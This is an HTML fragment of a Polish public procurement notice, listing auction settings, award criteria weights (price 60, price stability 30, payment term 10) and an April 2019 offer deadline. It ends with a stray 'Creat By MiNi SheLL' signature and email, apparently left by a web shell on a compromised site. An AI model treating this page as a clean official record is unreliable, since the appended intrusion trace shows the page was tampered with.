<br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>okres niezmienności cen</TD><TD style='border: 1px solid black;border-collapse: collapse;'>30,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin płatności</TD><TD style='border: 1px solid black;border-collapse: collapse;'>10,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Nie</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst"></span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2019-04-11</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">12:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">Polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com